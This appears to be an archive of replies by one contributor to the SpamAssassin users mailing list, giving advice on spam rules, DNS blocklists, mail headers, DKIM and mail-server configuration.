Re: new kind of spam with bizarre custom headers getting through
Hi George, At 11:02 04-09-2014, George Johnson wrote: I'm getting another slew of these this morning, all with a variety of strange headers added apparently to foil spam filtering. All are getting through my spamassassin set up, which is usually nearly bulletproof. Typical headers are: Imbrue-Gaol:17169949.17169949 Manila-Cairn: 12616748.12616748 Atonic-Alate: 78c35d32dc879cf5ccd83e99e6458854 Fungus-Onus:1716994978c35d32dc879cf5ccd83e99e6458854 Ernest-Phlox: 953-17169949 I have Bayes, Uribl-black, Spamcop, Pyzor, Razor, etc., enabled. Here is one of the headers with my addresses redacted: The odd headers change on each run. You should be able to catch them with Bayes. Regards, -sm
60_adsp_override_dkim.cf (was: Plans for a DMARC plugin ???)
Hi Mark, At 04:15 30-04-2014, Mark Martinec wrote: If you want to implement a similar effect to the new yahoo and aol DMARC policy by SpamAssassin, use rules similar to the default rules in 60_adsp_override_dkim.cf: adsp_override yahoo.com custom_med adsp_override yahoo.com.ar custom_med adsp_override yahoo.com.au custom_med adsp_override yahoo.com.br custom_med adsp_override yahoo.com.cn custom_med adsp_override yahoo.com.hk custom_med ... I did a quick verification. The above domains do not publish an ADSP record. Regards, -sm
Re: FSL_HELO_BARE_IP_2 RCVD_NUMERIC_HELO
At 02:56 15-10-2013, Stan Hoeppner wrote: In both cases the last two Received: headers in each message are forgeries as no SMTP transaction occurred. I'm sure this violates more than one SMTP RFC, but I doubt Gmane will change the way they do this any time soon. I don't think that there is any violation of the specification. Regards, -sm
Re: rdns in received header
At 13:42 21-02-2013, Kevin A. McGrail wrote: Unless betting for minor sums such as a beer or a happy meal, I generally won't get into RFC compliance arguments with DFS. My reading was similar though there are some other RFCs that extend SMTP and say things like if you use ESMTP, you have to add with ESMTP to the received headers. The following is about ESMTP: For instance, servers MUST support the EHLO command even if they do not implement any specific extensions and clients SHOULD preferentially utilize EHLO rather than HELO. Regards, -sm
Re: rdns in received header
At 11:07 24-02-2013, Kevin A. McGrail wrote: I'm referring to other RFCs such as 1651 which says: That's an obsoleted RFC. It might be better to refer to RFC 5321 (Section 4.4) for information about the Received: header. Regards, -sm
Re: wrong RCVD_IN_PBL?
Hi Andreas, At 11:45 20-11-2012, Andreas Schulze wrote: I have a similiar issue with a web.de (german webmail) user. He uses his iPhone to submit mail via web.de submission service. (TLS + Authentication) The message triggers RCVD_IN_PBL and others. Any hint to make those message pass sa? 82.165.159.34 is listed in PBL ( http://www.spamhaus.org/pbl/query/PBL1532253 ) Received: from mout-xforward.web.de (mout-xforward.web.de [82.165.159.34]) by idvmailin03.datev.de (Postfix) with ESMTP id 3Y5btV2sQ8z690G; Tue, 20 Nov 2012 20:04:02 +0100 (CET) The above would trigger that rule. Regards, -sm
Re: How to report a spam botnet
At 16:44 20-11-2012, Matt wrote: authenticated SMTP to relay not? Is there a way in apache .htaccess to block access based on xbl.spamhaus.org? I want to block exploited IP's from webmail etc as well. http://www.lucaercoli.it/mod_spamhaus.html Regards, -sm
Re: SA rules matching of private addresses
Hi Mabry, At 03:46 04-10-2012, Mabry Tyson wrote: The debug output shows that SA is (IMO, mis-) interpreting the x-originating-ip as a Received header. The IP address from the X-Origination-IP header field, similarly to those in the Receiver header fields, is used for DNSBL lookups. Regards, -sm
Re: How to check from that is not on the header?
Hi Sergio, At 08:09 26-09-2012, Sergio wrote: how may I can check a FROM different to the one on the headers? I have seen that some emails on the FROM on the header has something different than the FROM on the email, as an example: FROM THE HEADERS: Received: from (127.0.0.1) by http://mail62.us1.rsgsv.netmail62.us1.rsgsv.net (PowerMTA(TM) v3.5r16) id hcc8go0lj3g4 for mailto:fernando.lo...@puntocel.com.gtfernando.lo...@puntocel.com.gt; Wed, 26 Sep 2012 14:28:26 + (envelope-from bounce-mc.us4_769.128085-fernando.lopez=mailto:puntocel.com...@mail62.us1.rsgsv.netpuntocel.com...@mail62.us1.rsgsv.net) Subject: =?utf-8?Q?Masaje=20de=20Reflexolog=C3=ADa=20de=20pies=20con=20sales=20minerales=20relajantes=20y=20aromaterapia?= From: =?utf-8?Q?Cucupons.com?= mailto:ma...@cucupons.comma...@cucupons.com Reply-To: =?utf-8?Q?Cucupons.com?= mailto:ma...@cucupons.comma...@cucupons.com But the FROM that I want to block is the one that comes on the email: FROM: bounce-mc.us4_7776669.128085-Aileen.Miffs=mailto:anyemail@mail62.us1.rsgsv.netanyemail@mail62.us1.rsgsv.net I have the following rule: headerBLACKLIST_R From =~ /rsgsv\.net/i scoreBLACKLIST_R5.0 That's for the From: in the message header fields. But at the time of checking, it checks http://cucupons.comcucupons.com and the rule fails. What I have to use in order to check the FROM that comes on the email instead of the FROM that is on the headers? There is usually a Return-Path: header field which would have the bounce-mc.us4_769.128085-fernando.lopez=mailto:puntocel.com...@mail62.us1.rsgsv.netpuntocel.com...@mail62.us1.rsgsv.net email address on teh right-hand side. If you don't have that header field, you could base your rule on http://wiki.apache.org/spamassassin/EnvelopeSenderInReceived Regards, -sm
Re: Responsibility of sites that hold user-created documents (was Re: One-line URI body spam)
At 13:03 19-10-2011, David F. Skoll wrote: In my dream world, people would blacklist Google. I made a suggestion The approach would also be applicable for pastebin (which is generally suggested on this mailing list) and any other free service. The subject could be rewritten as responsibility of free services that hold user-created documents. Regards, -sm
Re: blacklist based on authoritative nameservers of sender domain
At 16:52 22-08-2011, Adam Katz wrote: You can't do whois en-masse (I'd love that, but ...), so this means an NS host lookup. To determine if they are authoritative, that's another lookup (which I don't believe is necessary). A blocklist would also be another lookup (if using a BL, it could check the authoritativeness), but I don't think that's completely necessary either. You don't need to use Whois. You already have the data: ; ANSWER SECTION: apache.org. 1800IN A 140.211.11.131 ;; AUTHORITY SECTION: apache.org. 86398 IN NS ns2.no-ip.com. apache.org. 86398 IN NS ns1.eu.bitnames.com. apache.org. 86398 IN NS ns2.surfnet.nl. apache.org. 86398 IN NS ns1.us.bitnames.com. It's been a while since I tested this. If I recall correctly, it was prone to false positives. You might be able to do some scoring instead of blacklisting. Regards, -sm
Re: How to prevent SA to make as112 calls?
At 05:09 28-04-2011, Michelle Konzack wrote: It has nothing to do with my Mailserver, because SA makes the requests to other DNS servers and then I get the UDP-Flood alarm... See http://tools.ietf.org/html/draft-ietf-dnsop-as112-under-attack-help-help-05 04/24/2011 23:52:56 **UDP flood** 192.168.0.69, 17549- 173.45.100.146, 53 (from COM1 Outbound) You can create the zones mentioned in http://tools.ietf.org/html/draft-ietf-dnsop-default-local-zones-15 Regards, -sm
Re: Score on sender domain by country
Hi Ram, At 23:34 10-04-2011, Ramprasad wrote: One of our clients has a purely local business and wants any mail coming from a foreign domain to be given a score for spam I would like to reduce the spam threshold , and then give a negative score for every mail with sender domain in India Is there a possibility of identifying the country where a domain is registered. Identyfying by tld seems in-correct No. You mentioned that using the ccTLD for negative scoring isn't what you want. If you assume that senders will be sending the mail from an IP address (or ASN) generally used within the country, you can put in a score for such a rule. You may have to allow some exceptions (e.g. by domain name). Regards, -sm
Re: SpamAssassin Integration
At 05:18 17-06-10, Matt Kettler wrote: The best docs would be the RFC standards: RFC 2822 Internet Message Format RFC 822 (obsoleted by above, but sometimes useful for understanding the history of the format, making intent clearer.) RFC 2822 obsoleted by RFC 5322. Regards, -sm
Re: rsys4.com and Paypal?
At 10:18 20-04-10, LuKreme wrote: I got a mail from Paypal, but it is not FROM paypal, but it appears to have passed DKIM If it passed DKIM and it is signed by info.paypal.com, it's from Paypal. Regards, -sm
RE: [LinkedIn Spam] Re: unwhitelist from_dkim?
At 15:11 19-03-10, Chris Richman wrote: If anyone knows of a reliable way to identify mailing list addresses, I'd love to know so we could block mail to them. Currently, we just do it when it's reported to us. I suppose one approach might be to block list.* domains or email addresses in the format *-l...@.* or other common mailing list address formats. It wouldn't catch all of them, I'm sure (m...@gnome.org, for example), but it might help. There isn't a reliable way to identify mailing list addresses. Regards, -sm
Re: MTAmark (was: MTX plugin functionally complete?)
At 02:56 15-02-10, Per Jessen wrote: I went to google mtamark, and came across a few discussions on mailing lists (e.g. at www.sage.org) as well as an article in iX (German IT magazine) in 2005. The proposal was certainly discussed quite a bit, but it's not very clear what then happened. I also saw a few links to personal pages at space.net, but they're long gone. There is experimental support for MTAMARK in a well-known MTA. The proposal had less exposure than SPF. Regards, -sm
Re: SA on outgoing SMTP
Hi Alexandre, At 10:44 16-02-10, Alexandre Chapellon wrote: I have a quite buggy customer network, full of zombie PCs that spends all days sending spam and wasting the whole reputation of my networks. Do they send these messages through your mail server? As a result it sometimes become quite hard to delivers queues for specific domains such as Yahoo!'s hosted ones. Indeed they have some temp fail (blacklist) mechanism that forbid my servers to send messages to them during hours. Taht's why I would like to setup some ougoing filtering to avoid sending too much spam through my mail relays. I think SA can help me in doing so, but I know too it's not really intented to work this way. I guess SA expects to work on MX hosts more than on smtp relays. You can still run some SpamAssassin tests to catch some of the spam. My prerequisites are mainly: - STOP as much spam as possible at SMTP time (before queuing) As this is outgoing, post-SMTP filtering is not much of an issue. Further more I can't rely on RBL because a lot of my dyn IP address are regularily listed on different blacklist. Relying on other people to tell you that there is a problem on your network is not a good idea. Sign up for feedback loops. Rate limit mail submissions or set up triggers to identify abnormalities. You may also wish to do traffic flow analysis to see what's going through your network. Regards, -sm
Re: SA on outgoing SMTP
At 13:49 16-02-10, Alexandre Chapellon wrote: Mostly not but thoose who are doing so make my mail servers being blacklisted from time to times. (And I don't really care about dyn IP adresses being on blacklists... for now) Your subnet will probably be blacklisted. As this is not the right venue to talk about escalation, I won't get into that. This is what i am doing... but I'd like to know if someone has done it too and how efficient it is. It can be quite efficient. If you are going to use a stock installation, it may not be as efficient. The efficiency also depends on the user-base. I don't want to set this up if It won't change my reputation and just cause some false positives. It won't change your reputation overnight. You will also have to overcome the growing pains if you have never used SpamAssassin. It definetly is when hitting the problem of false positive... I can't let a user thinking we sent his mail when we wrongly dropped it. I am not talking about dropping mail. False positives _will_ happen. Regards, -sm
Re: Pipe characters in From and To's
Hi Spiro, At 13:37 11-02-10, Spiro Harvey wrote: We're getting a boatload of To and From addresses starting with pipe characters on one of our clients' mailservers. The messages themselves don't appear particularly malicious -- the ones we've seen are just pill spam -- but there are craploads of them. If it's in the To address and you know that the local-part does not exist, you can configure your MTA to reject the message. So I'm just wondering if others encounter this with enough regularity, Yes. and if so what your thoughts and advice are. I don't particularly want to add rules into sendmail, so SA is my avenue of choice. Having a rule in sendmail is less work. Regards, -sm
Re: Hostkarma: to be or not to be in SA defaults
Hi Marc, At 09:32 30-09-2009, Marc Perkel wrote: I have a lot of mighty servers set up ad have servers at 4 locations. I have 50mb bought and using about 30 of it now. I am not sure what it takes to support a default SA inclusion. Does anyone know if what I described sounds like it is enough? They can still be a soft target. Most of the DNSBLs were unprepared to deal with denial of service attacks. Some of them have closed down after an attack. That can be a problem for users as most people have a configure and forget setup or it's a default vendor setup. The bandwidth may be enough for current usage. The more mirrors you have, the better. If your DNSBL is effective, you might be able to get help with that. The problems with your setup is not worse than other resources that are commonly used by users from this mailing list. Someone pointed out that it's not a good idea to do more DNS lookups as it affects the performance of SpamAssassin. It does not matter whether your DNSBL is included in the default configuration as people will use it if they believe that it is effective in stopping spam. If you are concerned about marketing, then it may matter to you. :-) Regards, -sm
Setting a Reply-To header for this mailing list (was: [sa] Re: Any one interested in using a proper forum?)
At 10:27 28-07-2009, Charles Gregory wrote: :0fw * ^(To|Cc):.*(use...@spamassassin|spamassassin.users) | /usr/bin/formail -IReply-To: users@spamassassin.apache.org Match on the List-Id: header instead of the To: or Cc:. Regards, -sm
Re: Spam Filter Law Suit
Hi Damian, The content of this message should not be taken as advice. Please seek proper legal advice. At 11:59 14-07-2009, Damian Mendoza wrote: Anyone else being sued by Southwest Technology Innovations regarding spam filtering? It's odd that they would name my old company (Workgroup Solutions) since they have very few installations (2 person reseller) compared to the others named. Any opinions or feedback? According to http://wiki.apache.org/spamassassin/SpamAssassinHistory the SpamAssassin source code was publicly available in April 2001. Previously, there was a context/keyword spam filter called filter.plx ( http://spamassassin.apache.org/prehistory/ ). I don't know whether the patent about enhancing touch and feel on the Internet is related to your questions. Regards, -sm
Re: OT: Website protection
At 05:06 11-07-2009, schmero...@gmail.com wrote: One of our client's websites gets hacked frequently - 1x per month - usually with some kind of phishing scam. I understand their first line of defense is to make sure security is tight and systems are up to date, however, it seems to me that there must be some scanning utility that would check their site for unauthorized pages via a search for domain names. If they are compromised regularly, they should go to the source of the problem and fix it. You could scan the file system to look for unauthorized files. You cannot do that for webpages. As the system is compromised, you cannot rely on the scan. Any ideas where to look for such a beast /or a mailing list that deals with this type of issue? Search for tripwire. Regards, -sm
Re: mailbox-list in sender: header?
At 03:57 09-07-2009, McDonald, Dan wrote: I recently received a spam with a mailbox-list in the from: and senderd: headers From: Inversiones inversiones.fo...@live.com, i...@lasinversionesforex.com Sender: Inversiones inversiones.fo...@live.com, i...@lasinversionesforex.com Since I had not seen mailbox-lists in a from: header before, I ran to read rfc5322: [snip] Clearly, this message failed this section. Would multiple addresses in either the From: or Subject: headers be a useful spam rule? Is that construct used often somewhere that I'm not familiar with? Did you mean Sender: header instead of Subject: header? Multiple addresses rarely appear in the From: header. It's better to have a rule for the multiple addresses in the Sender: header if you are receiving a lot of spam with the above headers. Regards, -sm
Re: twitter spam why RCVD_IN_DNSWL?
At 08:31 09-07-2009, Bob Proulx wrote: I just wanted to confirm that I am seeing twitter invite spam that appears AFAICT to be from twitter.com to addresses that are not and never have been associated with Twitter. Mostly moderated mailing lists. It looks to me like there is some type of interface at Twitter that allows a user to upload a list of email addresses and invite them to use Twitter. Probably because addresses exist in a user's mailbox they get spammed by Twitter with an invite. That's social networks spam. Your friends are happy to upload their address book to those sites so that you can be spammed. :-) If you are running mailing lists, don't whitelist those domains. That also applies if you don't want to be spammed by those domains. Regards, -sm
Re: constantcontact.com
At 10:56 05-07-2009, rich...@buzzhost.co.uk wrote: Well, I can only take you at face value that you are here representing Constant Contact. If I call up the office switchboard Tara, can I speak with you there? It's just I've called up Constant Contact and hit #9 for the directory and your name is not in there? Perhaps there is a misspelling or something? The name is spelled correctly. I consider that the person is speaking on behalf of that organization based on the message posted ( http://mail-archives.apache.org/mod_mbox/spamassassin-users/200907.mbox/%3cac9ad70907041849m735b0b68mb0909b83216b0...@mail.gmail.com%3e ) Regards, -sm
Re: constantcontact.com
At 11:00 06-07-2009, rich...@buzzhost.co.uk wrote: Have you handled spam or irate customer getting spam from Constant Contact? I prefer not to comment on that. What do you think about Constant Contact having a white list score in Spamassassin despite being listed in the multi.uri? There are several other domains which are on that list. You can remove a domain from the white list if you believe that it does not belong in it. What do you think about them being white listed by Barracuda? As this mailing list is about SpamAssassin, I don't think that it matters around here. Regards, -sm
Re: Apache.org spam??
At 08:10 25-06-2009, Jeremy Morton wrote: I recently got this spam that made its way thru SpamAssassin: [non-persistent information snipped] Looks like it was received from mail.apache.org which is in the DNSWL.org DB, unsurprisingly. Why would mail.apache.org send out this obvious spam? The message was sent by a mailing list subscriber to a list which generally discusses about spam. It scored 4.0 on Apache.org. Why is the message obvious spam? What rules would you recommend to catch it? Regards, -sm
Re: Apache.org spam??
At 09:13 25-06-2009, Benny Pedersen wrote: something as this on apache.org: header __RESENT1 exists:Resent-From header __RESENT2 exists:Resent-To header __RESENT3 exists:Resent-Date header __RESENT4 exists:Resent-Message-Id meta NO_RESENT_MAIL (__RESENT1 __RESENT2 __RESENT3 __RESENT4) describe NO_RESENT_MAIL Meta: please dont resend mail to maillists score NO_RESENT_MAIL 3.0 if i cant fix others problems but imho apache.org need the above :) Nice. The above rules cannot be applied for all apache.org traffic as it's not only for mailing lists. Regards, -sm
Re: unclosed if error
At 08:32 22-06-2009, Jean-Paul Natola wrote: I copied this rule from someone here on the list header __CTYPE_MULTIPART_ANY Content-Type =~ /multipart\/\w/i ifplugin Mail::SpamAssassin::Plugin::MIMEHeader mimeheader __ANY_TEXT_ATTACH Content-Type =~ /text\/\w+/i meta MIME_NO_TEXT (__CTYPE_MULTIPART_ANY !__ANY_TEXT_ATTACH) scoreMIME_NO_TEXT 2.00 describe MIME_NO_TEXT No text body parts end if and this error comes up when I when I run lint [35143] warn: config: unclosed 'if' in /usr/local/etc/mail/spamassassin/jp.cf: if plugin (Mail::SpamAssassin::Plugin::MIMEHeader) The end if should not be in the describe line. Add endif after the describe line to close the ifplugin condition. See http://mail-archives.apache.org/mod_mbox/spamassassin-users/200906.mbox/%3cpine.lnx.4.64.0906020849430.10...@mercury.impsec.org%3e Regards, -sm
RE: unclosed if error
At 12:20 22-06-2009, Jean-Paul Natola wrote: I have it like this now header __CTYPE_MULTIPART_ANY Content-Type =~ /multipart\/\w/i ifplugin Mail::SpamAssassin::Plugin::MIMEHeader mimeheader __ANY_TEXT_ATTACH Content-Type =~ /text\/\w+/i meta MIME_NO_TEXT (__CTYPE_MULTIPART_ANY !__ANY_TEXT_ATTACH) scoreMIME_NO_TEXT 2.00 describe MIME_NO_TEXT No text body parts endif and this is the error [39338] warn: config: unclosed 'if' in /usr/local/etc/mail/spamassassin/jp.cf: if plugin (Mail::SpamAssassin::Plugin::MIMEHeader) [39338] warn: config: unclosed 'if' in /usr/local/etc/mail/spamassassin/jp.cf: if plugin (Mail::SpamAssassin::Plugin::MIMEHeader) Tar the jp.cf file and send it to me off-list. Regards, -sm
Re: Lots of 419/scam and investment spams getting through suddenly
At 22:59 18-06-2009, Chip M. wrote: Here's a dump of the complete Countries routes of your samples (frequency first, then square brackets around the IP immediately outside your own network): 2 [France], Nigeria Do you really get such emails from Nigeria? :-) Regards, -sm
Re: Lots of 419/scam and investment spams getting through suddenly
At 15:36 19-06-2009, McDonald, Dan wrote: Of course. Don't you? Although usually the Nigerians relay through Italy, and sometimes Hong Kong. I don't see any email of that type originating from Nigeria in terms of SMTP. Most of these emails originate from other countries. Blocking Italy or Hong Kong won't help that much because of the mode of operation of these senders. One of the advantages of SpamAssassin is that it doesn't use one specific rule to detect spam. If you rely on one specific rule only, it will be subverted. Regards, -sm
Re: Lots of 419/scam and investment spams getting through suddenly
At 17:26 19-06-2009, RW wrote: The last hop into the internal network is rarely from Nigeria, but I find it turns up in X-Spam-Relay-Countries in about 9% of my own spam. Can you send me a sample of the email headers off-list? Regards, -sm
Re: List headers and footers [Re: Unsubscribe]
At 05:08 16-06-2009, McDonald, Dan wrote: Altering message bodies might break gpg|pgp signatures, but not DKIM. It generally invalidates the DKIM signature. This mailing list does not use Mailman. Regards, -sm
Re: 419 scams in .doc and .rtf attachments
At 10:41 16-06-2009, Rosenbaum, Larry M. wrote: We get a significant number of 419 scam letters where the actual spam text is in a Word (.doc or .rtf) or PDF attachment. Example: Don't limit yourself to that. Think of the next step. It would be really great if there was an SA plugin to extract the text from the attachment and then feed the text to the regular SA body rules. Has anybody looked at that possibility? See http://wiki.apache.org/spamassassin/FuzzyOcrPlugin It is possible to modify that plugin to call the wv library to extract the content. If you want to use regular rules, you would have to render the content before passing the modified message to SpamAssassin. Regards, -sm
Re: Unsubscribe
At 06:43 12-06-2009, Michael Scheidell wrote: SA mailing list folks: you might want to include both automatically in the footer of your emails. Yes, they will break dkim signing for many people, but maybe we should lead by example. The people that footer is intended for won't read it anyway. Regards, -sm
RE: Odd behaviour under load.
Hi John, At 06:50 08-05-2009, John Hardin wrote: I suspect the sender is timing out waiting for the 250 OK after sending the message, hence my (humorous) 100 Please hold... suggestion. (Jeeze, SM, lighten up!) There has already been such a proposal. Someone might take your humorous suggestion seriously, hence my comment. Regards, -sm
Re: Odd behaviour under load.
At 13:15 07-05-2009, John Hardin wrote: Heh. Does the SMTP protocol need a 100 Please hold... reply? No. Fix the mail server instead of the protocol. Regards, -sm
Re: emailBL
At 14:54 27-04-2009, David B Funk wrote: On Mon, 27 Apr 2009, John Hardin wrote: How about _at_ - I think a leading and trailing underscore will be very rare in real world domain name parts, especially as you can't register a domain name having an underscore, and may apps will discard hostnames with underscores as invalid. Ever seen a MicroSoft AD SRV dns query? Try something like: _gc._tcp.Default-First-Site._sites.win.ccad.uiowa.edu. Havn't seen one that contains leading and trailing underscores, -yet-. The previous comment was about hostnames. An underscore is not a valid character for a hostname. The example you gave is not a hostname. Regards, -sm
Re: Another bad kind of spams, for Pfizer knockoffs with image
At 13:12 24-04-2009, Igor Chudov wrote: I get plenty of these also, and cannot get them to score well. These advertise knockoffs of bestselling Pfizer products. The text is meaningless garbage text. The sales message is contained in a PNG image, but it could be other image types like jpeg. The following rule may help. You'll need the ImageInfo plugin. body PNG_200_400 eval:image_size_range('png', 200, 400, 250, 450) describe PNG_200_400 Contains png 200-250 x 400-450 score PNG_200_400 0.1 Adjust the score to fit your needs. Regards, -sm
Re: Phishing
At 17:05 24-04-2009, Casartello, Thomas wrote: One major issue we've been having lately is with phishing emails being targeted at us. They're being sent to us from hacked accounts at other educational institutes. The message usually is about Your EDU webmail account is expiring. Please send us your username and password to fix it. We've had some users fall for it, then their Exchange account gets turned into a spam machine (sending out usual junk spam as well as the original phishing message.) Because they are coming from legitimate sites, it's been very difficult to block these messages. I've been trying to write phrase rules with common words used in the message, but whoever's responsible for this is continually changing the message to prevent you from being able to catch them with phrase rules. Any thoughts? There was a project from an educational institution to target phishing emails. I don't recall the name of the project or whether the source code was released. It is going to be a lot of work to keep the rules updated to catch these emails. Analyze the emails instead of trying to apply the usual techniques to catch them. Instead of considering the emails as coming from legitimate sites, you should treat that as a data point as part of the patterns to identify. The words in the emails might change but the sender relies on some information for the phish to work. You should be able to parse the mail traffic for that information. BTW, there is a larger problem if there are hacked accounts available on the sending network and on your network. Regards, -sm
Re: emailreg.org (was: zen.spamhaus.org)
At 01:19 10-04-2009, Ralf Hildebrandt wrote: They could simply offer free registration for old domains... They could. I doubt that someone running such a service would do that if people are willing to pay. At 04:52 10-04-2009, Rob McEwen wrote: I don't understand your last sentence above. It seems to make no sense. I'll clarify off-list. EXCEPT TO STATE: Who knows much of anything for absolute certain about this situation? For example, it is entirely within the realm of possibility that emailreg.org is a separate non-commercial and non-profit organization (as the .org seems to imply?). And maybe emailreg.org really is a separate entity from Barracuda (as the I don't see any difference in the usage of .org instead of .com as there are commercial organizations that use it. AND EXCEPT TO ASK: Is that $20 fee a one-time fee? Or a yearly fee? Or, does it have any kind of expiration date? Who knows? It will be interesting to see whether the rules are included in a SpamAssassin distribution. Regards, -sm
emailreg.org (was: zen.spamhaus.org)
Hi Rob, At 12:52 07-04-2009, Rob McEwen wrote: I had no idea that emailreg.org was owned and operated by Barracuda. I http://www.barracudacentral.org/about/emailreg http://www.emailreg.org/index.cgi?p=about But, as the post you mentioned said, emailreg.org resolves to 64.235.146.64 and arin.net shows that 64.235.146.64 is clearly in Barracuda's assigned address space. I'll tell you right now... this is BIG and EASY money. Very BIG and very EASY money. I suspect they are pulling in hundreds... maybe even thousands... of those $20 payments per day. The usage policy at http://www.emailreg.org/index.cgi?p=policy mentions that there is a $20 registration fee to discourage domain tasters from sending spam and to further verify the contact information. (if I seem upset about this... read between the lines... and you might understand why) Are you upset because people are paying money to a site with a domain owner hidden by the Whois privacy registration? :-) Some antispam offers are big and easy money as there's always somebody ready to pay or to jump on the bandwagon because it is free. Regards, -sm
Re: Ways to block bouncebacks?
At 02:59 05-04-2009, Jeremy Morton wrote: Well, as far as I can tell from that document, SRS is great at saying, yep, this is a legit bounce message. But, if SRS says it doesn't seem to be, aren't you rather back at square 1? A message that looks like a regular e-mail, doesn't really have any spam You can use BATV. You must then submit all messages for the domain through a mail server that supports BATV. Regards, -sm
Re: Suddenly bouncing emails
At 07:46 23-03-2009, klowther wrote: I started suddenly getting lots of bounces. I'm using the latest Mandriva. I have traced it down to EVERY email getting points from uribil and surbil. I checked one list on surbil and it isn't listed. I guess I need to know how to fix/disable this module? As far as I can tell EVERY email is getting the exact same score added to it. Thanks. URIBL_GREY Contains an URL listed in the URIBL greylist [URIs: mod_frontpage.so] 2.0 URIBL_BLACKContains an URL listed in the URIBL blacklist [URIs: mod_frontpage.so] 2.0 URIBL_PH_SURBL Contains an URL listed in the PH SURBL blocklist Do a DNS test for a non-existent hostname. If you receive an answer, switch to a name server (you can run one locally) that provides genuine replies. Regards, -sm
Re: efax sends it own phishing email.? or java script I can't decode?
At 05:02 21-03-2009, Michael Scheidell wrote: client got an html email (which was scored really high) due to the 'unable to obtain payment from your credit card' with a link to their web site where they advised client to log in and enter in new credit card information. neat (useless?) java script in email: There isn't any Javascript in the email. initially I suspected it as just another phishing email, but best I can tell (unless there is some neat java stuff in the email), headers, typical phishing email designed to trick the gullable into putting in their credit card info), but I can't tell why this ISN'T efax's web site in the link: Here are some convenient options for resolving this situation: This isn't a phishing email. There is an eFax web site in the link. If we are unable to collect payment from your credit card, we have to inform the customer. That is usually done by email. Regards, -sm
Re: Dealing with low scoring spam - tighter MTA integration [was: 2 + 2 != 4 - Spamassassin needs a new paradigm]
At 07:02 04-03-2009, Andrzej Adam Filip wrote: May be spamassassin should create set of tests intended for use before replying RCPT TO: in SMTP session? [ test based on: sending IP address, envelope sender, envelope recipient, and name in helo/ehlo ] SpamAssassin processes the message and returns the result. The way it is designed, it can be integrated in different environments as it is MTA agnostic. The change you propose could be done by introducing a new command in the protocol to evaluate the envelope information only. It would be easier to do all that through a milter as there is less overhead. The downside is that you will get more false positives. Regards, -sm
Re: ReturnPath, Habeas, BondedSender
At 17:20 02-03-2009, J.D. Falk wrote: (BTW, a quick visit to your favorite search engine should alleviate any fears that either Neil or I are marketers.) I can confirm that J.D. is not in marketing. He did not top-post or send his message in HTML format. :-) Regards, -sm
Re: How to disable DNSWL?
At 04:25 03-03-2009, Michelle Konzack wrote: The network in my enterprise is *.private.tamay-dogan.net and the outgoing mailserver mail.private.tamay-dogan.net which is correctly configured and of course, not accessibel from outside the world. Hence, I am sending messages over the relay server7.pinguin-hosting.de from my hosting provider. Now, nearly each 6th E-Mail from me comes back as bounce since they all tell me, spamassassin is thinking I have a trojan/bot in my network. Being listed in ZEN does not necessarily mean that the host has a trojan or bot. This spamassassin setup is definitively crap, because if yo look in the header of any of my messages, you see, I am an legitimat authenticated sender. The headers of your message are correct. Using ZEN for all IP addresses listed in the headers will result in incorrect hists. Post the headers and the rules that message hit. Regards, -sm
Re: Something doofuzzled in a * ^To: line.
At 18:38 23-02-2009, Gene Heskett wrote: The input line looks like this: To: unlisted-recipients:; (no To-header on input)@gmail-pop.l.google.com Is your MTA or POP3 client adding the @gmail-pop.l.google.com at the end of that line? You could add a rule to catch the no To-header comment. Regards, -sm
Re: Something doofuzzled in a * ^To: line.
At 22:08 23-02-2009, Gene Heskett wrote: Not that I know of. Fetchmail occasionally squawks about a race in the PEEK_MSG function, maybe a couple times a day. ~/.procmailrc has no such edit line in it. Obviously it did come in through my gmail account. The MSG_PEEK is used on sockets and that's where the race condition occurs. Humm, if it can't find the unlisted stuff in the same line... Your software may have added a line wrap. :0: *^*no To-header on input* /dev/null I haven't tested that recipe. It should work. You can enable the Procmail log file for debugging. Regards, -sm
Re: HELO checks give too high score together
At 23:16 21-02-2009, Benny Pedersen wrote: why does a smtp server have dynamic hostname alike in the first place ? What is a dynamic hostname? Regards, -sm
Re: HELO checks give too high score together
At 01:20 22-02-2009, Benny Pedersen wrote: you dont know it either ? The term dynamic hostname is used in intermediate system routing. Regards, -sm
Re: Error ''connect to spamd on 127.0.0.1 failed, retrying (# 1 of 3): Connection timed out ''
At 15:16 16-02-2009, Kalil Costa - Brasilsite wrote: Next, I have a full qmailtoaster (qmail, Vpopmail, simscan, clamav, spamassassin, etc.) and this occurs the following error in maillog connect to spamd on 127.0.0.1 failed, retrying (# 1 of 3): Connection timed out Based on the error message, spamd is not listening on localhost. Regards, -sm
Re: Filtering/ blocking forged emails
At 12:52 06-02-2009, Nandini Mocherla wrote: I am new to postfix/SpamAssassin and thinking for a way to block the email address which does not come from that domain. For example, if someone with a @xxx.com email sends to a list it must come from a server in the xxx.com domain else it should be rejected. Is it possible to do this? As there is every possibility that spammers can also send with real That's similar to SPF. You can configure Postfix to block these messages through policyd or a milter. user's id and I am planning to have a check that would be able to compare the From: and the Message-Id domains to check for spoofed messages coming in from an open relay. Its just an idea to eliminate every possible attack. As i don't have much experience with There isn't any correlation between the domain part of the address used in the From: and what appears in the Message-ID. postfix, just installed/configured a couple of days ago any suggestions in this regard will be highly helpful for me. I have also read some whre about Sender Score Certified support in SpamAssassin. But not sure how this works? Will it check the senders from address and compare it with the domain? There are three RCVD_IN_BSP_ rules for that. Regards, -sm
Re: Filtering/ blocking forged emails
At 13:10 06-02-2009, Michael Scheidell wrote: (ps, someone has a FP on whois_contactpriv) Doesn't look like apache or espphotograpy.com or dslextreme.com It's not a false positive. There was xxx.com in the message. Regards, -sm
RE: country in africa
At 22:39 30-01-2009, RobertH wrote: when an email comes in with the word nigeria in it, it should get scored something. You could score the content if it mentions a country in Africa. We then have to obfuscate the words so that we can mention them on this mailing list. It's better to use Bayes to deal with that type of email. Regards, -sm
RE: country in africa
At 08:18 31-01-2009, RobertH wrote: and if i understand correctly, you can tell the SA config not to bayes_ignore_from *...@spamassassin.apache.org bayes_ignore_to users@spamassassin.apache.org Right. There are still some subscribers who don't realize that some of the messages from this mailing list will trigger their antispam filters as the discussion is generally about spam. Regards, -sm
Re: Bayesian per domain filtering
At 12:46 18-01-2009, Munroe Sollog wrote: I am sure this has been asked before, however, I cannot find any clear documentation nor archives addressing this question. I would like to store a per domain bayesdb, preferably in a database. Is there documentation on doing this? No. You would have to patch the code to do that. Regards, -sm
RE: Temporary 'Replacements' for SaneSecurity
